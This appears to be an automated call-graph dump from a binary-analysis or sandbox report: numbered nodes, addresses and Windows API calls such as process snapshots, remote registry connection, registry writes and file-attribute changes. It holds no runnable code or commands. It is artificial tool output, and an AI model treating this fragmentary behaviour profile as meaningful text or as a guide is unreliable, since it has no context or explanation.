ca61fe 98408 cc3ef6 81 API calls __wsopen_s 98372->98408 98373 ca5c7f 98379 c5be6d 8 API calls 98373->98379 98373->98382 98374->98382 98377 c5be6d 8 API calls 98377->98383 98379->98382 98380 c705d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98380->98383 98381 c5bf07 8 API calls 98381->98383 98382->98327 98383->98366 98383->98367 98383->98368 98383->98370 98383->98372 98383->98373 98383->98377 98383->98380 98383->98381 98383->98382 98384 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98383->98384 98385 ca60b9 98383->98385 98387 c60a5e messages 98383->98387 98404 c61940 253 API calls 2 library calls 98383->98404 98405 c61e00 40 API calls messages 98383->98405 98384->98383 98406 cc3ef6 81 API calls __wsopen_s 98385->98406 98407 cc3ef6 81 API calls __wsopen_s 98387->98407 98388->98333 98389->98333 98391 c5b412 98390->98391 98392 c5b40c 98390->98392 98391->98335 98392->98391 98393 c5be6d 8 API calls 98392->98393 98393->98391 98394->98342 98396 c5be81 98395->98396 98398 c5be90 __fread_nolock 98395->98398 98397 c7019b 8 API calls 98396->98397 98396->98398 98397->98398 98398->98351 98401 c5c78b messages 98399->98401 98400 c5c7c6 messages 98400->98361 98401->98400 98403 c6e29c 8 API calls messages 98401->98403 98403->98400 98404->98383 98405->98383 98406->98387 98407->98382 98408->98382 98409->98382 98410 c708c0 98419 c70d22 GetModuleHandleW 98410->98419 98412 c708c8 98413 c708fe 98412->98413 98414 c708cc 98412->98414 98421 c75194 28 API calls _abort 98413->98421 98416 c708d7 98414->98416 98420 c75176 28 API calls _abort 98414->98420 98417 c70906 98419->98412 98420->98416 98421->98417 98422 c7f08e 98423 c7f09a __FrameHandler3::FrameUnwindToState 98422->98423 98424 c7f0a6 98423->98424 98425 c7f0bb 98423->98425 98441 c7f669 20 API calls __dosmaperr 98424->98441 98435 c7951d EnterCriticalSection 98425->98435 98428 c7f0ab 98442 c82b7c 26 API calls __wsopen_s 98428->98442 98429 c7f0c7 98436 c7f0fb 98429->98436 98434 c7f0b6 __wsopen_s 98435->98429 98444 c7f126 98436->98444 98438 c7f108 98439 c7f0d4 98438->98439 98464 c7f669 20 API calls __dosmaperr 98438->98464 98443 c7f0f1 LeaveCriticalSection __fread_nolock 98439->98443 98441->98428 98442->98434 98443->98434 98445 c7f134 98444->98445 98446 c7f14e 98444->98446 98475 c7f669 20 API calls __dosmaperr 98445->98475 98465 c7dce5 98446->98465 98449 c7f157 98472 c89799 98449->98472 98450 c7f139 98476 c82b7c 26 API calls __wsopen_s 98450->98476 98454 c7f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 98454->98438 98455 c7f1df 98458 c7f20e 98455->98458 98459 c7f1fc 98455->98459 98456 c7f25b 98457 c7f268 98456->98457 98456->98458 98478 c7f669 20 API calls __dosmaperr 98457->98478 98458->98454 98479 c7f2bb 30 API calls 2 library calls 98458->98479 98477 c7f43f 31 API calls 4 library calls 98459->98477 98462 c7f206 98462->98454 98464->98439 98466 c7dd06 98465->98466 98467 c7dcf1 98465->98467 98466->98449 98480 c7f669 20 API calls __dosmaperr 98467->98480 98469 c7dcf6 98481 c82b7c 26 API calls __wsopen_s 98469->98481 98471 c7dd01 98471->98449 98482 c89616 98472->98482 98474 c7f173 98474->98454 98474->98455 98474->98456 98475->98450 98476->98454 98477->98462 98478->98454 98479->98454 98480->98469 98481->98471 98483 c89622 __FrameHandler3::FrameUnwindToState 98482->98483 98484 c8962a 98483->98484 98485 c89642 98483->98485 98517 c7f656 20 API calls __dosmaperr 98484->98517 98486 c896f6 98485->98486 98490 c8967a 98485->98490 98522 c7f656 20 API calls __dosmaperr 98486->98522 98489 c8962f 98518 c7f669 20 API calls __dosmaperr 98489->98518 98507 c854d7 EnterCriticalSection 98490->98507 98491 c896fb 98523 c7f669 20 API calls __dosmaperr 98491->98523 98495 c89680 98497 c896b9 98495->98497 98498 c896a4 98495->98498 98496 c89703 98524 c82b7c 26 API calls __wsopen_s 98496->98524 98508 c8971b 98497->98508 98519 c7f669 20 API calls __dosmaperr 98498->98519 98502 c896a9 98520 c7f656 20 API calls __dosmaperr 98502->98520 98503 c89637 __wsopen_s 98503->98474 98504 c896b4 98521 c896ee LeaveCriticalSection __wsopen_s 98504->98521 98507->98495 98525 c85754 98508->98525 98510 c8972d 98511 c89735 98510->98511 98512 c89746 SetFilePointerEx 98510->98512 98538 c7f669 20 API calls __dosmaperr 98511->98538 98513 c8975e GetLastError 98512->98513 98516 c8973a 98512->98516 98539 c7f633 20 API calls __dosmaperr 98513->98539 98516->98504 98517->98489 98518->98503 98519->98502 98520->98504 98521->98503 98522->98491 98523->98496 98524->98503 98526 c85761 98525->98526 98527 c85776 98525->98527 98540 c7f656 20 API calls __dosmaperr 98526->98540 98532 c8579b 98527->98532 98542 c7f656 20 API calls __dosmaperr 98527->98542 98529 c85766 98541 c7f669 20 API calls __dosmaperr 98529->98541 98532->98510 98533 c857a6 98543 c7f669 20 API calls __dosmaperr 98533->98543 98534 c8576e 98534->98510 98536 c857ae 98544 c82b7c 26 API calls __wsopen_s 98536->98544 98538->98516 98539->98516 98540->98529 98541->98534 98542->98533 98543->98536 98544->98534 98545 c5f48c 98548 c5ca50 98545->98548 98549 c5ca6b 98548->98549 98550 ca14af 98549->98550 98551 ca1461 98549->98551 98570 c5ca90 98549->98570 98593 cd61ff 253 API calls 2 library calls 98550->98593 98554 ca146b 98551->98554 98557 ca1478 98551->98557 98551->98570 98591 cd6690 253 API calls 98554->98591 98572 c5cd60 98557->98572 98592 cd6b2d 253 API calls 2 library calls 98557->98592 98558 c6e781 39 API calls 98558->98570 98561 ca1742 98561->98561 98563 c5cf30 39 API calls 98563->98570 98566 c5cd8e 98567 ca168b 98595 cd6569 81 API calls 98567->98595 98570->98558 98570->98563 98570->98566 98570->98567 98570->98572 98573 c5b3fe 8 API calls 98570->98573 98576 c602f0 253 API calls 98570->98576 98577 c5be6d 8 API calls 98570->98577 98579 c5bdc1 98570->98579 98583 c6e73b 39 API calls 98570->98583 98584 c6aa19 253 API calls 98570->98584 98585 c705d2 5 API calls __Init_thread_wait 98570->98585 98586 c6bbd2 8 API calls 98570->98586 98587 c70433 29 API calls __onexit 98570->98587 98588 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98570->98588 98589 c6f4ed 81 API calls 98570->98589 98590 c6f354 253 API calls 98570->98590 98594 caff4f 8 API calls 98570->98594 98572->98566 98596 cc3ef6 81 API calls __wsopen_s 98572->98596 98573->98570 98576->98570 98577->98570 98580 c5bdcc 98579->98580 98582 c5bdfb 98580->98582 98597 c5bf39 39 API calls 98580->98597 98582->98570 98583->98570 98584->98570 98585->98570 98586->98570 98587->98570 98588->98570 98589->98570 98590->98570 98591->98557 98592->98572 98593->98570 98594->98570 98595->98572 98596->98561 98597->98582 98598 c60e6f 98599 c60e83 98598->98599 98604 c613d5 98598->98604 98600 c60e95 98599->98600 98601 c7016b 8 API calls 98599->98601 98602 ca55d0 98600->98602 98603 c5b3fe 8 API calls 98600->98603 98605 c60eee 98600->98605 98601->98600 98702 cc1a29 8 API calls 98602->98702 98603->98600 98604->98600 98608 c5be6d 8 API calls 98604->98608 98622 c6044d messages 98605->98622 98631 c62ad0 98605->98631 98608->98600 98609 ca62cf 98706 cc3ef6 81 API calls __wsopen_s 98609->98706 98611 c61645 98617 c5be6d 8 API calls 98611->98617 98611->98622 98612 c7016b 8 API calls 98630 c60326 messages 98612->98630 98614 ca61fe 98705 cc3ef6 81 API calls __wsopen_s 98614->98705 98615 c5be6d 8 API calls 98615->98630 98616 ca5c7f 98621 c5be6d 8 API calls 98616->98621 98616->98622 98617->98622 98621->98622 98623 c5bf07 8 API calls 98623->98630 98624 c70433 29 API calls pre_c_initialization 98624->98630 98625 c705d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98625->98630 98626 c60a5e messages 98704 cc3ef6 81 API calls __wsopen_s 98626->98704 98627 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98627->98630 98628 ca60b9 98703 cc3ef6 81 API calls __wsopen_s 98628->98703 98630->98609 98630->98611 98630->98612 98630->98614 98630->98615 98630->98616 98630->98622 98630->98623 98630->98624 98630->98625 98630->98626 98630->98627 98630->98628 98700 c61940 253 API calls 2 library calls 98630->98700 98701 c61e00 40 API calls messages 98630->98701 98632 c62b36 98631->98632 98633 c62f70 98631->98633 98635 ca7b7c 98632->98635 98636 c62b50 98632->98636 99041 c705d2 5 API calls __Init_thread_wait 98633->99041 99051 cd79f9 253 API calls 98635->99051 98639 c630e0 9 API calls 98636->98639 98638 c62f7a 98641 c62fbb 98638->98641 99042 c5b25f 98638->99042 98642 c62b60 98639->98642 98640 ca7b88 98640->98630 98646 ca7b91 98641->98646 98648 c62fec 98641->98648 98644 c630e0 9 API calls 98642->98644 98645 c62b76 98644->98645 98645->98641 98647 c62bac 98645->98647 99052 cc3ef6 81 API calls __wsopen_s 98646->99052 98647->98646 98662 c62bc8 __fread_nolock 98647->98662 98649 c5b3fe 8 API calls 98648->98649 98651 c62ff9 98649->98651 99049 c6e662 253 API calls 98651->99049 98652 c62f94 99048 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98652->99048 98654 ca7bb9 99053 cc3ef6 81 API calls __wsopen_s 98654->99053 98657 c63032 99050 c6fe59 8 API calls 98657->99050 98658 ca7c1c 99055 cd60a2 53 API calls _wcslen 98658->99055 98659 c62cfc 98660 c630e0 9 API calls 98659->98660 98663 c62d09 98660->98663 98662->98651 98662->98654 98664 c7016b 8 API calls 98662->98664 98665 c7019b 8 API calls 98662->98665 98670 c602f0 253 API calls 98662->98670 98671 c62cef 98662->98671 98672 ca7bfd 98662->98672 98675 ca7bb4 98662->98675 98667 c630e0 9 API calls 98663->98667 98668 ca7d45 98663->98668 98664->98662 98665->98662 98674 c62d23 98667->98674 98668->98675 99056 cc3ef6 81 API calls __wsopen_s 98668->99056 98670->98662 98671->98658 98671->98659 99054 cc3ef6 81 API calls __wsopen_s 98672->99054 98674->98668 98676 c5be6d 8 API calls 98674->98676 98678 c62d87 messages 98674->98678 98675->98630 98676->98678 98677 c630e0 9 API calls 98677->98678 98678->98657 98678->98668 98678->98675 98678->98677 98681 c62e3b messages 98678->98681 98707 cc276a 98678->98707 98711 cbe9c5 GetFileAttributesW 98678->98711 98713 ccde5d 98678->98713 98718 cc65b4 98678->98718 98723 cdac49 98678->98723 98728 cc4ad5 98678->98728 98733 c6f95e 98678->98733 98740 cc6d2d 98678->98740 98753 cc874a 98678->98753 98780 c57953 98678->98780 98784 cc5ed5 98678->98784 98814 cd9eea 98678->98814 98817 cdcd16 98678->98817 98906 cdeb63 98678->98906 98942 cc95f6 98678->98942 98957 cc8e39 98678->98957 98976 cc6561 98678->98976 98983 c6be75 98678->98983 98679 c62edd 98679->98630 98681->98679 99040 c6e29c 8 API calls messages 98681->99040 98700->98630 98701->98630 98702->98622 98703->98626 98704->98622 98705->98622 98706->98622 98708 cc2778 98707->98708 98709 cc2773 98707->98709 98708->98678 99057 cc183b 98709->99057 98712 cbe9d1 98711->98712 98712->98678 98714 c5b3fe 8 API calls 98713->98714 98715 ccde70 98714->98715 98716 cc183b 10 API calls 98715->98716 98717 ccde78 98716->98717 98717->98678 99082 c58e70 98718->99082 98722 cc65d1 98722->98678 98724 c58e70 52 API calls 98723->98724 98725 cdac65 98724->98725 99114 cbdc9c CreateToolhelp32Snapshot Process32FirstW 98725->99114 98727 cdac74 98727->98678 98729 c58e70 52 API calls 98728->98729 98730 cc4ae8 98729->98730 99229 cbda81 98730->99229 98732 cc4af0 98732->98678 99245 c5c92d 98733->99245 98735 c6f972 98736 cafac0 Sleep 98735->98736 98737 c6f97a timeGetTime 98735->98737 98738 c5c92d 39 API calls 98737->98738 98739 c6f990 98738->98739 98739->98678 98741 c58e70 52 API calls 98740->98741 98742 cc6d47 98741->98742 98743 cc6d84 98742->98743 98745 c5c92d 39 API calls 98742->98745 99251 cbe783 98743->99251 98746 cc6d76 98745->98746 98746->98743 99256 c5557e 98746->99256 98747 cc6d92 99266 c57a59 98747->99266 98751 c58e70 52 API calls 98751->98747 98752 cc6dd7 98752->98678 98754 cc875a __wsopen_s 98753->98754 98755 c58e70 52 API calls 98754->98755 98756 cc877b 98755->98756 98757 c5c92d 39 API calls 98756->98757 98764 cc8799 98756->98764 98757->98764 98758 c58e70 52 API calls 98759 cc887c 98758->98759 98760 c5557e 9 API calls 98759->98760 98761 cc88a7 98760->98761 99274 c7d913 98761->99274 98763 cc88cd 98765 cc88f7 GetCurrentDirectoryW SetCurrentDirectoryW 98763->98765 98764->98758 98769 cc8973 98764->98769 98766 cc8921 98765->98766 98765->98769 98767 cbe387 4 API calls 98766->98767 98768 cc892a 98767->98768 98768->98769 98770 cbe9c5 GetFileAttributesW 98768->98770 98769->98678 98771 cc8938 98770->98771 98772 cc89cb 98771->98772 98773 cc8940 GetFileAttributesW SetFileAttributesW 98771->98773 99277 cc9f9f FindFirstFileW 98772->99277 98774 cc8969 SetCurrentDirectoryW 98773->98774 98775 cc89b1 98773->98775 98774->98769 98777 cc89b5 SetCurrentDirectoryW 98775->98777 98778 cc8a02 SetCurrentDirectoryW 98775->98778 98777->98772 98778->98769 98779 cc89ea 98779->98778 98781 c5795d 98780->98781 98782 c5796c 98780->98782 98781->98678 98782->98781 98783 c57971 CloseHandle 98782->98783 98783->98781 98785 cc5fbd 98784->98785 98786 cc5ef4 98784->98786 98788 c58e70 52 API calls 98785->98788 98797 cc6011 98785->98797 98787 c5c92d 39 API calls 98786->98787 98789 cc5eff 98787->98789 98790 cc5fef 98788->98790 98791 c5c92d 39 API calls 98789->98791 98792 c58e70 52 API calls 98790->98792 98793 cc5f15 98791->98793 98794 cc6001 98792->98794 98793->98785 98796 c5bf07 8 API calls 98793->98796 99321 cbd836 98794->99321 98798 cc5f26 98796->98798 98797->98678 98799 c5bf07 8 API calls 98798->98799 98800 cc5f2f 98799->98800 98801 c58e70 52 API calls 98800->98801 98802 cc5f3c 98801->98802 98803 c5694e 8 API calls 98802->98803 98804 cc5f4f 98803->98804 98805 c57af4 8 API calls 98804->98805 98806 cc5f60 98805->98806 98813 cc5f89 98806->98813 99364 cbdc8e 98806->99364 98808 c5c92d 39 API calls 98808->98785 98810 c5b25f 8 API calls 98811 cc5f80 98810->98811 98812 cbda81 12 API calls 98811->98812 98812->98813 98813->98808 99453 cd88b6 98814->99453 98816 cd9efa 98816->98678 98818 c5bf07 8 API calls 98817->98818 98819 cdcd39 98818->98819 98820 c5bf07 8 API calls 98819->98820 98821 cdcd42 98820->98821 98822 c5bf07 8 API calls 98821->98822 98823 cdcd4b 98822->98823 98824 c58e70 52 API calls 98823->98824 98834 cdcdda 98823->98834 98825 cdcd71 98824->98825 99596 cdd6b1 98825->99596 98827 cdcda5 99622 cdd2f7 98827->99622 98829 cdcdd6 98830 cdce76 RegCreateKeyExW 98829->98830 98831 cdce0f RegConnectRegistryW 98829->98831 98829->98834 98833 cdcf0e 98830->98833 98841 cdcead 98830->98841 98831->98830 98831->98834 98835 cdd1d6 RegCloseKey 98833->98835 98836 c58e70 52 API calls 98833->98836 98834->98678 98835->98834 98837 cdd1e9 RegCloseKey 98835->98837 98838 cdcf29 98836->98838 98837->98834 99632 c74db8 98838->99632 98840 cdcf38 98842 cdcf44 98840->98842 98843 cdcf96 98840->98843 98841->98834 98845 cdceff RegCloseKey 98841->98845 98844 c58e70 52 API calls 98842->98844 98846 c58e70 52 API calls 98843->98846 98847 cdcf4e _wcslen 98844->98847 98845->98834 98848 cdcfa0 98846->98848 98853 c58e70 52 API calls 98847->98853 98849 c74db8 _strftime 40 API calls 98848->98849 98850 cdcfaf 98849->98850 98851 cdcfbf 98850->98851 98852 cdd047 98850->98852 98855 c58e70 52 API calls 98851->98855 98854 c58e70 52 API calls 98852->98854 98856 cdcf70 98853->98856 98857 cdd051 98854->98857 98858 cdcfc9 _wcslen 98855->98858 98859 c58e70 52 API calls 98856->98859 98860 c74db8 _strftime 40 API calls 98857->98860 98866 c58e70 52 API calls 98858->98866 98861 cdcf85 98859->98861 98862 cdd060 98860->98862 98863 cdd2bb RegSetValueExW 98861->98863 98864 cdd156 98862->98864 98865 cdd070 98862->98865 98863->98835 98885 cdd01f 98863->98885 98869 c58e70 52 API calls 98864->98869 98867 c58e70 52 API calls 98865->98867 98868 cdcfeb 98866->98868 98871 cdd07a 98867->98871 98872 c58e70 52 API calls 98868->98872 98870 cdd160 98869->98870 98873 c74db8 _strftime 40 API calls 98870->98873 98874 c7019b 8 API calls 98871->98874 98875 cdd000 RegSetValueExW 98872->98875 98876 cdd16f 98873->98876 98877 cdd09f 98874->98877 98875->98835 98875->98885 98880 c58e70 52 API calls 98877->98880 98885->98835 98907 c5bf07 8 API calls 98906->98907 98908 cdeb7a 98907->98908 98909 c58e70 52 API calls 98908->98909 98910 cdeb89 98909->98910 99646 c57a14 98910->99646 98913 c58e70 52 API calls 98914 cdeba9 98913->98914 98915 cdec26 98914->98915 98916 cdebc1 98914->98916 98917 c58e70 52 API calls 98915->98917 98918 c5c92d 39 API calls 98916->98918 98919 cdec2b 98917->98919 98920 cdebc6 98918->98920 98921 cdec38 98919->98921 98922 cdec73 98919->98922 98920->98921 98924 cdebdf 98920->98924 98923 c56ab6 8 API calls 98921->98923 98925 cdec8b 98922->98925 98927 c5c92d 39 API calls 98922->98927 98939 cdec45 98923->98939 98926 c58685 8 API calls 98924->98926 98928 c5c92d 39 API calls 98925->98928 98933 cdeca4 98925->98933 98930 cdebec 98926->98930 98927->98925 98928->98933 98929 c5be6d 8 API calls 98931 cdecbe 98929->98931 98932 c57af4 8 API calls 98930->98932 99651 cb9b57 98931->99651 98935 cdebfa 98932->98935 98933->98929 98936 c58685 8 API calls 98935->98936 98937 cdec13 98936->98937 98938 c57af4 8 API calls 98937->98938 98941 cdec21 98938->98941 98939->98678 98940 c57a59 8 API calls 98940->98939 98941->98940 98943 c5bf07 8 API calls 98942->98943 98944 cc9607 98943->98944 98945 c58e70 52 API calls 98944->98945 98946 cc9616 98945->98946 98947 c5557e 9 API calls 98946->98947 98948 cc9621 98947->98948 98949 c58e70 52 API calls 98948->98949 98950 cc962e 98949->98950 98951 c58e70 52 API calls 98950->98951 98952 cc9640 98951->98952 98953 c58e70 52 API calls 98952->98953 98954 cc9655 WritePrivateProfileStringW 98953->98954 98955 cc966b WritePrivateProfileStringW 98954->98955 98956 cc9677 98954->98956 98955->98956 98956->98678 98958 c5bf07 8 API calls 98957->98958 98959 cc8e4a 98958->98959 98960 c7019b 8 API calls 98959->98960 98961 cc8e54 98960->98961 99670 c541a6 98961->99670 98964 c58e70 52 API calls 98965 cc8e6d 98964->98965 98966 c5557e 9 API calls 98965->98966 98967 cc8e78 98966->98967 98968 c58e70 52 API calls 98967->98968 98969 cc8e85 98968->98969 98970 c58e70 52 API calls 98969->98970 98971 cc8e97 98970->98971 98972 c58e70 52 API calls 98971->98972 98973 cc8eac GetPrivateProfileStringW 98972->98973 98974 c56ab6 8 API calls 98973->98974 98975 cc8ecf messages 98974->98975 98975->98678 98977 c58e70 52 API calls 98976->98977 98978 cc6577 98977->98978 99673 cbdb69 98978->99673 98980 cc657f 98981 cc6583 GetLastError 98980->98981 98982 cc6598 98980->98982 98981->98982 98982->98678 98984 c56ab6 8 API calls 98983->98984 98985 c6be8d 98984->98985 98986 c7016b 8 API calls 98985->98986 98990 ca8f7a 98985->98990 98988 c6bea6 98986->98988 98989 c7019b 8 API calls 98988->98989 98992 c6beb7 98989->98992 98991 c6bf1f 98990->98991 99744 cca607 39 API calls 98990->99744 98995 c5c92d 39 API calls 98991->98995 98999 c6bf2c 98991->98999 98993 c57953 CloseHandle 98992->98993 98994 c6bec2 98993->98994 98996 c5bf07 8 API calls 98994->98996 98997 ca8fdc 98995->98997 98998 c6beca 98996->98998 98997->98999 99000 ca8fe4 98997->99000 99001 c57953 CloseHandle 98998->99001 99721 c6fdc9 98999->99721 99003 c5c92d 39 API calls 99000->99003 99004 c6bed1 99001->99004 99008 c6bf33 99003->99008 99005 c58e70 52 API calls 99004->99005 99006 c6bedd 99005->99006 99007 c57953 CloseHandle 99006->99007 99011 c6bee7 99007->99011 99009 ca8ff9 99008->99009 99010 c6bf4e 99008->99010 99014 c7019b 8 API calls 99009->99014 99013 c57a14 8 API calls 99010->99013 99698 c56e52 99011->99698 99016 c6bf56 99013->99016 99017 ca8ffe 99014->99017 99726 c6bfbc 99016->99726 99021 ca9012 99017->99021 99745 c541c9 99017->99745 99018 c6bf00 99706 c56b12 99018->99706 99019 ca8f72 99743 c57923 CloseHandle messages 99019->99743 99030 ca9016 __fread_nolock 99021->99030 99748 cc1759 8 API calls ___scrt_fastfail 99021->99748 99022 c6bf65 99027 c57a59 8 API calls 99022->99027 99022->99030 99031 c6bf79 99027->99031 99028 c6bf0e 99740 c56afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 99028->99740 99034 c6bfb3 99031->99034 99035 c57953 CloseHandle 99031->99035 99032 ca8f3b 99742 cbd4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 99032->99742 99033 c6bf15 99033->98991 99033->99032 99034->98678 99037 c6bfa7 99035->99037 99037->99034 99741 c57923 CloseHandle messages 99037->99741 99038 ca8f52 99038->98991 99040->98681 99041->98638 99043 c5b26e _wcslen 99042->99043 99044 c7019b 8 API calls 99043->99044 99045 c5b296 __fread_nolock 99044->99045 99046 c7016b 8 API calls 99045->99046 99047 c5b2ac 99046->99047 99047->98652 99048->98641 99049->98657 99050->98657 99051->98640 99052->98675 99053->98675 99054->98675 99055->98674 99056->98675 99058 cc1852 99057->99058 99072 cc196b 99057->99072 99059 cc1872 99058->99059 99060 cc189f 99058->99060 99062 cc18b6 99058->99062 99059->99060 99064 cc1886 99059->99064 99061 c7019b 8 API calls 99060->99061 99075 cc1894 __fread_nolock 99061->99075 99063 c7019b 8 API calls 99062->99063 99073 cc18d3 99062->99073 99063->99073 99066 c7019b 8 API calls 99064->99066 99065 cc18fa 99067 c7019b 8 API calls 99065->99067 99066->99075 99068 cc1900 99067->99068 99076 c6c1f1 99068->99076 99069 c7016b 8 API calls 99069->99072 99072->98708 99073->99064 99073->99065 99073->99075 99075->99069 99077 c7019b 8 API calls 99076->99077 99078 c6c208 99077->99078 99079 c7016b 8 API calls 99078->99079 99080 c6c214 99079->99080 99081 c6f9e2 10 API calls 99080->99081 99081->99075 99083 c58e85 99082->99083 99100 c58e82 99082->99100 99084 c58e8d 99083->99084 99085 c58ebb 99083->99085 99110 c75556 26 API calls 99084->99110 99086 c96b10 99085->99086 99089 c58ecd 99085->99089 99097 c96a29 99085->99097 99113 c75513 26 API calls 99086->99113 99111 c6fe8f 51 API calls 99089->99111 99090 c58e9d 99093 c7016b 8 API calls 99090->99093 99091 c96b28 99091->99091 99095 c58ea7 99093->99095 99098 c5b25f 8 API calls 99095->99098 99096 c96aa2 99112 c6fe8f 51 API calls 99096->99112 99097->99096 99099 c7019b 8 API calls 99097->99099 99098->99100 99101 c96a72 99099->99101 99105 cbe387 lstrlenW 99100->99105 99102 c7016b 8 API calls 99101->99102 99103 c96a99 99102->99103 99104 c5b25f 8 API calls 99103->99104 99104->99096 99106 cbe3a5 GetFileAttributesW 99105->99106 99107 cbe3cf 99105->99107 99106->99107 99108 cbe3b1 FindFirstFileW 99106->99108 99107->98722 99108->99107 99109 cbe3c2 FindClose 99108->99109 99109->99107 99110->99090 99111->99090 99112->99086 99113->99091 99124 cbe723 99114->99124 99116 cbdd9b CloseHandle 99116->98727 99117 cbdce9 Process32NextW 99117->99116 99123 cbdce2 99117->99123 99118 c5bf07 8 API calls 99118->99123 99119 c5b25f 8 API calls 99119->99123 99123->99116 99123->99117 99123->99118 99123->99119 99130 c5694e 99123->99130 99172 c57af4 99123->99172 99181 c6e2e5 99123->99181 99128 cbe72e 99124->99128 99125 cbe745 99188 c7668b 39 API calls _strftime 99125->99188 99128->99125 99129 cbe74b 99128->99129 99187 c76742 GetStringTypeW _strftime 99128->99187 99129->99123 99131 c5bf07 8 API calls 99130->99131 99132 c56964 99131->99132 99133 c5bf07 8 API calls 99132->99133 99134 c5696c 99133->99134 99135 c5bf07 8 API calls 99134->99135 99136 c56974 99135->99136 99137 c5bf07 8 API calls 99136->99137 99138 c5697c 99137->99138 99139 c569b0 99138->99139 99140 c95725 99138->99140 99142 c58685 8 API calls 99139->99142 99141 c5be6d 8 API calls 99140->99141 99143 c9572e 99141->99143 99144 c569be 99142->99144 99205 c5bceb 99143->99205 99146 c596d9 8 API calls 99144->99146 99147 c569c8 99146->99147 99148 c569f3 99147->99148 99149 c58685 8 API calls 99147->99149 99150 c56a38 99148->99150 99151 c56a14 99148->99151 99167 c95750 99148->99167 99153 c569e9 99149->99153 99189 c58685 99150->99189 99151->99150 99202 c5627c 99151->99202 99155 c596d9 8 API calls 99153->99155 99154 c56a49 99157 c56a5f 99154->99157 99162 c5be6d 8 API calls 99154->99162 99155->99148 99158 c56a73 99157->99158 99163 c5be6d 8 API calls 99157->99163 99161 c56a7e 99158->99161 99165 c5be6d 8 API calls 99158->99165 99160 c584b7 8 API calls 99169 c95810 99160->99169 99166 c5be6d 8 API calls 99161->99166 99171 c56a89 99161->99171 99162->99157 99163->99158 99164 c58685 8 API calls 99164->99150 99165->99161 99166->99171 99167->99160 99168 c5627c 8 API calls 99168->99169 99169->99150 99169->99168 99211 c5acc0 8 API calls __fread_nolock 99169->99211 99171->99123 99173 c57b06 99172->99173 99174 c963b3 99172->99174 99213 c57b17 99173->99213 99223 c5662b 8 API calls __fread_nolock 99174->99223 99177 c57b12 99177->99123 99178 c963bd 99179 c5be6d 8 API calls 99178->99179 99180 c963c9 99178->99180 99179->99180 99182 c6e2f4 CompareStringW 99181->99182 99185 cae463 99181->99185 99184 c6e319 99182->99184 99184->99123 99185->99184 99186 c7e24b 40 API calls 99185->99186 99186->99185 99187->99128 99188->99129 99190 c58694 99189->99190 99191 c586f1 99189->99191 99190->99191 99193 c5869f 99190->99193 99192 c596d9 8 API calls 99191->99192 99198 c586c2 __fread_nolock 99192->99198 99194 c966b7 99193->99194 99195 c586ba 99193->99195 99197 c7016b 8 API calls 99194->99197 99212 c58894 8 API calls 99195->99212 99199 c966c1 99197->99199 99198->99154 99200 c7019b 8 API calls 99199->99200 99201 c966f4 99200->99201 99203 c5c269 8 API calls 99202->99203 99204 c56287 99203->99204 99204->99150 99204->99164 99206 c5bd05 99205->99206 99207 c5bcf8 99205->99207 99208 c7016b 8 API calls 99206->99208 99207->99148 99209 c5bd0f 99208->99209 99210 c7019b 8 API calls 99209->99210 99210->99207 99211->99169 99212->99198 99214 c57b26 99213->99214 99220 c57b5a __fread_nolock 99213->99220 99215 c963e4 99214->99215 99216 c57b4d 99214->99216 99214->99220 99217 c7016b 8 API calls 99215->99217 99224 c57cb3 99216->99224 99219 c963f3 99217->99219 99221 c7019b 8 API calls 99219->99221 99220->99177 99222 c96427 __fread_nolock 99221->99222 99223->99178 99225 c57cc9 99224->99225 99227 c57cc4 __fread_nolock 99224->99227 99226 c7019b 8 API calls 99225->99226 99228 c964be 99225->99228 99226->99227 99227->99220 99228->99228 99241 c579ed 99229->99241 99232 cbdaca GetLastError 99233 cbdad7 CreateDirectoryW 99232->99233 99234 cbdae5 99232->99234 99233->99234 99235 cbdae3 99233->99235 99234->99235 99236 c596d9 8 API calls 99234->99236 99235->98732 99237 cbdb27 99236->99237 99238 cbda81 8 API calls 99237->99238 99239 cbdb30 99238->99239 99239->99235 99240 cbdb34 CreateDirectoryW 99239->99240 99240->99235 99242 c579fb 99241->99242 99243 c596d9 8 API calls 99242->99243 99244 c57a0f GetFileAttributesW 99243->99244 99244->99232 99244->99235 99246 c5c93e 99245->99246 99247 c5c945 99245->99247 99246->99247 99250 c76661 39 API calls _strftime 99246->99250 99247->98735 99249 c5c988 99249->98735 99250->99249 99272 c922f0 99251->99272 99254 c584b7 8 API calls 99255 cbe7b8 99254->99255 99255->98747 99255->98751 99257 c922f0 __wsopen_s 99256->99257 99258 c5558b GetFullPathNameW 99257->99258 99259 c555c5 99258->99259 99260 c555aa 99258->99260 99262 c5bceb 8 API calls 99259->99262 99261 c584b7 8 API calls 99260->99261 99263 c555b6 99261->99263 99262->99263 99264 c579ed 8 API calls 99263->99264 99265 c555c2 99264->99265 99265->98743 99267 c57a9e 99266->99267 99269 c57a65 99266->99269 99268 c5be6d 8 API calls 99267->99268 99270 c57a78 99267->99270 99268->99270 99271 c7016b 8 API calls 99269->99271 99270->98752 99271->99270 99273 c92304 GetShortPathNameW 99272->99273 99273->99254 99291 c7d6be 99274->99291 99278 cca03a FindClose 99277->99278 99286 cc9fc9 99277->99286 99279 cca04b FindFirstFileW 99278->99279 99280 cca0e2 99278->99280 99288 cca060 99279->99288 99289 cca0d9 FindClose 99279->99289 99280->98779 99281 cca028 FindNextFileW 99281->99278 99281->99286 99283 cca0c7 FindNextFileW 99283->99288 99283->99289 99284 cc9ff7 GetFileAttributesW SetFileAttributesW 99285 cca0eb FindClose 99284->99285 99284->99286 99285->99280 99286->99281 99286->99284 99287 cca0a0 SetCurrentDirectoryW 99287->99288 99288->99283 99288->99287 99288->99289 99290 cca0c0 SetCurrentDirectoryW 99288->99290 99289->99280 99290->99283 99292 c7d6d5 99291->99292 99293 c7d89f 99291->99293 99292->99293 99297 c7d740 99292->99297 99319 c7f669 20 API calls __dosmaperr 99293->99319 99295 c7d8af 99320 c82b7c 26 API calls __wsopen_s 99295->99320 99298 c7d764 